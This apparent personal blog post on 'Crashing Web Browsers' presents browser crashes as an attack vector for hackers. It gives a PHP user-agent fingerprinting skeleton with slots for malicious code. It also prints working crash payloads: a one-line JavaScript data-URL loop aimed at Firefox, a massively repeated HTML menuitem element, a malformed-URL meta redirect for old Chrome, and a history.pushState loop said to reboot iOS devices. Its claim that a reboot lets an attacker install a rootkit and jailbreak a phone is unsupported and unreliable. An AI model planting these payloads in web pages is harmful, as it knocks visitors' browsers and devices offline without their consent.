Crashing Web Browsers

Share This:

If you like my work show support on my Patreon
pcw-browsers-primary-100609192-largeHave you ever experienced your time when your surfing the internet and your browser starts to become really slow then ends up crashing? There are many variables to why this may have happened. If it happens frequently and you never visit sites your unfamiliar with it could simply be that you have your browser configured in a way that makes it unstable. You could even have addons that conflict with each other which can cause such issues.

Other times websites just have so much sloppy code and code that conflicts with other code on the site that it causes issues with peoples browsers. The occurrence of browsers crashing is common on the Internet. It is so common hackers can use the knowledge that many people experience the issue so often they wont think much of it when it happens. But of course crashing a web browser alone wont benefit a hacker. However what can be done while the browser is in the middle of crashing is a different story.

For example they could have their code inject dll’s into your browser that will redirect all your future browsing activities to them. Or injecting code into a dll that will make the browser download and install programs onto your computer without ever knowing. But hey injecting code into software means the software is being modified, and the signatures will have been changed. Sometimes they wont inject code into the software and they will simply do something that can be equally malicious and is only temporary. They might just simply make the browser download and install a stub to one of their RAT’s the one time you actually visit the site, then they pretty much can own your system without ever modifying any programs.

But how is this done?

Different browsers are built differently this means crashing browsers is different for each browser. The attacker needs to know what his/her target is in order to attack the browser correctly. This can be done with Javascript or PHP or pretty much any language. I use PHP for identifying browsers simply because it becomes easy to collect and keep the data that has been obtained after doing this. Below is some PHP code for identifying the browser.


<?php
//Function to identify mobile devices

function isMobile()
{
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
// Using the function we created above
if(isMobile())
{
// Identifies the browser is Firefox on an Android device if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// We put code specific to the this browser here
}
// Identifies the browser is the Trident Browser on a Windows phone
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Windows Phone')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Trident')))
{
// We put code here
}
// For older windows phones eg Windows CE
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'MSIE')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Windows CE')))
{ // Yep code here
}
// This one is a bit odd because the default web browser for Android has a //user agent that has the //word safari in it. But it is not Apple safari //browser.
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Safari')))
{
// Our code here
}
// This is for the Opera Browser for Android
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Android')))
{
// code here
}
// Honestly I don't know anyone who uses Symbian OS based phones. And I //really don't know many //exploits for this system. But it still is nice to know if someone is using it.
else if (strlen(strpos($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strpos($_SERVER['HTTP_USER_AGENT'],'SymbOS')))
{
// code here
}
//Due to the fact that Crhome for iOS and Safari both use the same rendering engine we need to look //for other unique idenfiers.
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Version')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'iPod')))
{
// Code here
}
// The above identified the iOS chrome browser the below identifies safari for iOS
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'CriOS')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'iPod')))
{
// code here
}
// It's funny how blackberry for years prided itself on security but they have always been the most //insecure mobile phone
else if(strpos($_SERVER['HTTP_USER_AGENT'],'BlackBerry') !== FALSE)
{
// Code here
}
}
// Now lets work on desktops
else
{
// Identifies Internet Exploder
if(strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'MSIE')))
{
// code here
}
// Identifies newer browsers that ship with Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Trident')))
{
// code goes here
}
// Identifies the Windows version of Apple Safari
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari')))
{
// Code goes here
}
// Identifies the Windows version of Firefox
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// Code goes here
}
// Identifies the windows version of Google Chrome
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// Identifies Mozillas not so common SeaMonkey for Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'SeaMonkey')))
{
// Code here
}
// Idenifies Opera for Windows
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Windows')))
{
// code here
}
// Lets do Apple the least secure bullshit in the whole world who brags about how few viruses they // have // This is for their Safari browser
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Safari'))) {
// code here
}
// Firefox for Apple
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// code here
}
// Chrome for Apple
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// Opera for Apple
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Macintosh')))
{
// code here
}
// Time for Linux this part is really fun
// Firefox for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Firefox')))
{
// code here
}
// Chrome for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Chrome')))
{
// code here
}
// Opera for Linux
else if (strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Opera')) && strlen(strstr($_SERVER['HTTP_USER_AGENT'],'Linux')))
{
// code here
}
} ?>

Now that he have a way of identifying the browser we can exploit it appropriately. We simply add malicious code to the areas of the above code. Once this can be any code. Below is some javascript code.

<script>// <![CDATA[
//This is a freaken scary one because it crashes firefox with a single line of Javascript code
location = "data:text/html,<script>location+=location+'A'.repeat(100000000);<\/script>";
// ]]</script>

As the comment in the code states it crashes firefox. It works with Windows, Mac and Linux versions of Firefox. The attacker simply places the above script into the <head></head> of the site. But it doesn’t work if the Firefox user has Javascript disabled or uses the NoScript Firefox Addon which allows you to choose what sites to disable Javascript on. This is why script kids use Javascript. But creative people with malicious intentions find ways around such issues. Like the below example.


<menu type="context" id="another exploit no js needed"><menuitem label="repeat this over and over'"></menuitem>

The above we will simply repeat over and over again about 10000000 times. And honestly it isn’t hard to get the code to written down that many times. We simply create a shell script or a batch file with a while loop that outputs the needed to text to a file. Refer to my past bogs or research basic programming to learn how to do it. Quite simple and one of the first things you learn when programming.

 

It is also worth mentioning that with versions of Google Chrome older then version 43 the browser will crash with simply using long malformed URL’s. So if it goes to website that has a URL that looks like the following.

http://www.example.com/This is a Malformed URL you see how it has spaces and nothing filling the spaces in it and then you see how ridiculously long the url is.html

The URL above contains spaces and is really long. Which throws older versions of Google chrome off and causes it crash. Simply putting a meta refresh tag in the site. And have it redirect in 0 miliseconds after it refreshes will be simple enough. And no Javascript is required. This is why it is always recomend to always be sure to have the most up to date software, to prevent malicious code from exploiting unpatched older programs.

Now I will show one more. This one will crash the browsers to most iDevices but do a hell of a lot more then just crash the browsers.

<script>
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
</script>

So the above code pretty much pushes the history of the browser back 100000 times. Pretty much what is is doing is the same thing you do when you click the button on your browser to go back to the previous page you where just on. It does this 100000 times. Now obviously the chances of a person visiting 100000 pages in one browsing session in the same tab is very unlikely which is why the browser crashes. Now we could say the same for it at lower integers as well. However 100000 holds an extra speacial power for iOS devices. 100000 overloads the hardware capabilities it can handle. And because it can’t process all the data being pushed to it the iDevice reboots.

When any device is in the reboot phase it has it’s own set of very unique vulnerbilities. If we catch it just right and program our code correctly we could in theory place a rootkit on the device and then jailbreak the iDevice, set a password for it and gain full access to the iDevice. Imagine seeing your phone bill go threw the roof from calls made to India you never made. Yep this could have happened because of such an attack.

Now it is important to understand that none of the code I have provided here is malicious by itself. And can have practical purposes for it’s use. However the code I do provide can be used with other code to be used in a very malicious manner.
If you like my work show support on my Patreon